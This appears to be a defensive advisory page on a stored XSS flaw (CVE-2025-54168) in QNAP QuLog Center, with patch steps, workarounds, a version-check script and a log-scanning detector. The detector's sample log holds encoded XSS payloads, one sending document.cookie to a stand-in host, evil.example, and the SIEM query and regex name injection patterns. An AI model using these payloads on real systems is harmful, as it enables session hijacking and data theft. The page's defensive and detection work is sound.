CVE-2025-54168
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in QuLog Center allows an authenticated attacker who already holds administrator privileges to store a malicious script in the application. The script is persisted server-side and executes in the browser of any user who later views the affected page, which can bypass security controls or expose application data. Only systems running vulnerable versions of QuLog Center are affected.
💻 Affected Systems
- QNAP QuLog Center
📦 What is this software?
QuLog Center is QNAP's log management application for its NAS operating systems. It collects and displays system event and access logs and can receive logs from other devices, so the content it renders is partly attacker-influenced by design.
⚠️ Risk & Real-World Impact
Worst Case
An attacker with compromised admin credentials could execute arbitrary JavaScript in the context of other users' sessions, potentially stealing session tokens, performing actions as those users, or reading sensitive log data. Because the payload is stored, it keeps firing on every page view until the offending entry is removed.
Likely Case
An attacker with legitimate or compromised admin access could inject malicious scripts that execute when other administrators view affected pages, potentially leading to session hijacking or data exfiltration.
If Mitigated
With administrator accounts restricted to trusted personnel and the patch applied, the exposure is confined to the administrator population: the residual risk is one administrator compromising another administrator's session, with no direct exposure of regular users.
🎯 Exploit Status
Exploitation requires administrator credentials. The vulnerability is a classic stored XSS injected through the web interface: a malicious value is saved, then rendered without adequate output encoding when another administrator views it. No public exploit is referenced in the vendor advisory linked below.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: QuLog Center 1.8.2.923 (2025/08/27) and later
Vendor Advisory: https://www.qnap.com/en/security-advisory/qsa-25-42
Restart Required: Yes
Instructions:
1. Log into the QNAP NAS admin interface.
2. Navigate to App Center.
3. Check for updates to QuLog Center.
4. Update to version 1.8.2.923 or later.
5. Restart the QuLog Center service.
🔧 Temporary Workarounds
Restrict Admin Access
Limit administrator accounts to trusted personnel, remove unused admin accounts, and enforce strong authentication (unique passwords and two-step verification) on the remaining ones. Since exploitation needs admin credentials, shrinking that population shrinks the attack surface.
Web Application Firewall
Deploy a WAF with XSS rules in front of the NAS web interface to block obvious script-injection attempts. Treat this as defence in depth only: signature rules are routinely bypassed with encoding and alternative tags, and a WAF does not remove a payload that has already been stored.
🧯 If You Can't Patch
- Do not expose the NAS web interface to the internet; restrict it to a management VLAN or VPN so that only trusted networks can reach QuLog Center
- Review QuLog Center entries that accept free-text input (names, descriptions, notes) for unexpected HTML or script content, and remove anything suspicious
- Monitor administrator account activity for suspicious behaviour and configure short session timeouts so a hijacked session token expires quickly
🔍 How to Verify
Check if Vulnerable:
Check the installed QuLog Center version in the QNAP App Center, or via SSH by reading the QPKG registry:
grep -i -A 10 QuLogCenter /etc/config/qpkg.conf
The Version line in the matching section is the installed version; anything below 1.8.2.923 is vulnerable.
Verify Fix Applied:
Confirm the version is 1.8.2.923 or higher. Optionally, enter a harmless marker such as <b>test</b> in a free-text field, reload the page, and confirm it is displayed literally (encoded) rather than rendered as HTML.
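The version check above, as an added example that is not part of the original page or QNAP's own tooling. It parses the INI-style /etc/config/qpkg.conf, reads the Version value from the QuLog Center section, and compares it numerically against the fixed version, which avoids the classic string-comparison mistake ("1.8.10.1" < "1.8.2.923" as strings). The section name [QuLogCenter] and the sample file contents are assumptions for illustration.

```python
"""Check whether the QuLog Center recorded in /etc/config/qpkg.conf is below the fixed version."""
import re
import sys
from typing import Optional, Tuple

FIXED_VERSION = "1.8.2.923"  # fixed version per QSA-25-42, as stated on this page

# Constructed sample of qpkg.conf for offline use; the [QuLogCenter] section name
# and the keys shown are assumptions, not copied from a real NAS.
SAMPLE_QPKG_CONF = """\
[QuLogCenter]
Name = QuLogCenter
Version = 1.8.1.908
Enable = TRUE
Install_Path = /share/CACHEDEV1_DATA/.qpkg/QuLogCenter

[OtherApp]
Name = OtherApp
Version = 9.9.9
"""


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '1.8.2.923' into (1, 8, 2, 923) so tuple comparison orders versions correctly."""
    return tuple(int(part) for part in re.findall(r"\d+", version))


def installed_version(conf_text: str, section: str = "QuLogCenter") -> Optional[str]:
    """Return the Version value from the named [section], or None if the app is absent."""
    current = None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            continue
        if current and current.lower() == section.lower() and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "version":
                return value.strip()
    return None


def is_vulnerable(conf_text: str) -> Optional[bool]:
    """True if QuLog Center is installed and older than FIXED_VERSION, False if fixed, None if not installed."""
    version = installed_version(conf_text)
    if version is None:
        return None
    return parse_version(version) < parse_version(FIXED_VERSION)


if __name__ == "__main__":
    # Usage: python3 check_qulog.py [/etc/config/qpkg.conf]; falls back to the sample.
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/config/qpkg.conf"
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        text = SAMPLE_QPKG_CONF
    found = installed_version(text)
    state = is_vulnerable(text)
    if state is None:
        print("QuLog Center not found in", path)
    else:
        print(f"QuLog Center {found}: {'VULNERABLE' if state else 'fixed'} (fixed in {FIXED_VERSION})")
```

Copy the file off the NAS (or run the script there if a Python package is installed) and pass its path as the first argument; the section name can be adjusted if the real registry uses a different one.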
📡 Detection & Monitoring
Log Indicators:
- Unusual administrator login patterns
- Multiple failed login attempts to admin accounts
- Suspicious POST requests to QuLog Center endpoints with script tags
Network Indicators:
- HTTP requests containing script injection patterns to QuLog Center URLs
- Unexpected outbound connections from QuLog Center server
SIEM Query:
source="*quLog*" AND (http_method=POST AND (uri="*quLog*" OR uri="*admin*") AND (content="*<script>*" OR content="*javascript:*" OR content="*onload=*"))
This query matches literal strings only. A payload submitted as %3Cscript%3E, as HTML entities, or with a different tag or event handler (img onerror, svg onload) will not match, so decode request bodies before pattern matching and correlate hits with the source account and IP rather than relying on the signatures alone.
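The detection logic above, as an added example that is not part of the original page or any QNAP product. It runs over constructed access-log lines (source IP, method, path, body), decodes percent-encoding and HTML entities in layers before matching, and flags a broader tag and event-handler set than the SIEM query's three literals. It also keeps a raw-literal matcher equivalent to the query so the difference is visible. The log format, the /QuLogCenter/setting path, and the hostnames are assumptions.

```python
"""Flag POST requests to QuLog Center carrying script-injection payloads, after decoding."""
import html
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed sample log lines (not real QNAP output): "<src_ip> <method> <path> <body>".
SAMPLE_LOG = [
    "10.0.0.5 POST /QuLogCenter/setting name=syslog01&note=daily+rotation",
    "10.0.0.9 POST /QuLogCenter/setting name=%3Cscript%3Elocation%3D%27http%3A//evil.example/%3F%27%2Bdocument.cookie%3C/script%3E",
    "10.0.0.9 POST /QuLogCenter/setting note=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E",
    "10.0.0.9 POST /QuLogCenter/setting note=%26lt%3Bsvg%20onload%3Dalert(1)%26gt%3B",
    "10.0.0.3 POST /QuLogCenter/setting note=<script>alert(1)</script>",
    "10.0.0.5 GET /QuLogCenter/ -",
    "10.0.0.7 POST /admin/users name=bob&role=admin",
]

# Assumed: QuLog Center UI paths contain "qulog", mirroring the uri="*quLog*" clause above.
QULOG_PATH = re.compile(r"/qulog", re.I)

# Broad triage heuristic: common injection tags, the javascript: scheme, and on*= handlers.
XSS_PATTERNS = re.compile(
    r"<\s*(script|img|svg|iframe|object|embed|body)\b|javascript\s*:|\bon[a-z]+\s*=",
    re.I,
)


def decode_layers(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding and HTML entities repeatedly until the string stops changing."""
    for _ in range(rounds):
        decoded = html.unescape(unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per POST to a QuLog path whose decoded body matches XSS_PATTERNS."""
    hits = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue
        src, method, path, body = parts
        if method != "POST" or not QULOG_PATH.search(path):
            continue
        decoded = decode_layers(body)
        match = XSS_PATTERNS.search(decoded)
        if match:
            hits.append({"src": src, "path": path, "match": match.group(0), "decoded": decoded})
    return hits


def raw_matches(lines: List[str]) -> List[str]:
    """Literal matching equivalent to the SIEM query's three content clauses, for comparison."""
    return [l for l in lines if "<script>" in l or "javascript:" in l or "onload=" in l]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['src']} {hit['path']} matched {hit['match']!r}: {hit['decoded']}")
    print(f"decoded scan: {len(scan_log(SAMPLE_LOG))} hits, literal query: {len(raw_matches(SAMPLE_LOG))} hit(s)")
```

On the sample, the decoded scan flags four requests while the literal query flags one (the unencoded <script> line). The on*= clause is deliberately loose and will also match benign parameter names such as online=1, so treat hits as triage candidates and pivot on the submitting account and source address.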